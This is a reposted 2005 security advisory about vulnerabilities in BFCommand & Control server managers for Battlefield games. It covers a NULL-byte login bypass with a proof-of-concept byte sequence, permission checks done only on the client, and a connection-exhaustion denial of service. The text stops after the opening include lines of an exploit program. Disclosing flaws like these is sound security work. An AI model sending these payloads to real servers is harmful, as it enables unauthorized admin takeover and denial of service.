Tuesday, August 30, 2005

[NT] BFCommand and Control, Battlefield 1942 and BFVietnam Multiple Vulnerabilities

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

BFCommand and Control, Battlefield 1942 and BFVietnam Multiple
Vulnerabilities
------------------------------------------------------------------------

SUMMARY

<http://www.bfcommandcontrol.org/> BFCommand & Control Server Manager is
a server manager available for the games Battlefield 1942 (with the name
BFCC), Battlefield Vietnam (BFVCC) and Battlefield 2 (BF2CC).
The difference between these server managers and the others available on
Internet is that BFVCC is also directly included in the CD of Battlefield
Vietnam so it's used on many servers.

Lack of proper information validation, and connection manager allow
attackers to perform multiple type of attacks on BFCommand and Control and
BF Viatman.

DETAILS

Vulnerable Systems:
* BFCC version 1.22_A and lower
* BFVCC version 2.14_B and lower

Immune Systems:
* BFVCCDaemon any version

Full anonymous login bypass:
An anonymous user can bypass the login mechanism and gain a full
administration privileges.
Without using the login mechanism, the attacker can bypass the log engine,
except for several commands that does been logged if used.

Login bypass through NULL username:
The "login" command naturally is composed by username and a password but
the if attackers place a NULL byte (0x00) in the username field, they
will able to bypass the authentication and the server will grant the
access to the attacker.

Proof of Concept:
"login" "\x1e" // command
"\0" "\x1e" // username (NULL byte)
"none" "\x1e" // password
"none" "\x1e" // username
"" "\x1e" // ???
"" // ???
"\x00\x40\x40\x00" // command delimiter

Invulnerable clients and full privileges:
The administrator (and moreover the local administrator) have the ability
of booting the other remote administrators.
Command such as "Boot" and others that have an effect on the clients are
ignored and the server continues to keep the connection and any operation
or disconnection is made by the client not the server.
In short a modified client (for example placing a NULL byte where is
located the Unicode command Boot in the executable) cannot be booted.
Then each administrators can be limited in what he or she can do by
setting some permissions in the "User Profiles" section.
Just like for the Boot command also the permissions are client-side so
an administrator with a very restricted power can take the full control of
the server manager.

Server full after consecutive connections:
A sort of "fake players" attack with the difference that here after 20
consecutive connections (just a simple connect and disconnect) the server
becomes full forever.
In short if the client doesn't send the "login" command the server
considers the connection in an idle state and when is reached the limit of
20 connections (although the connections and the sockets have been
closed!) it becomes full and nobody can use the server manager from
remote.

Exploit:
winerr.h can be found at:
<http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html>
http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html
bfccown.c:
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>

No comments:

Post a Comment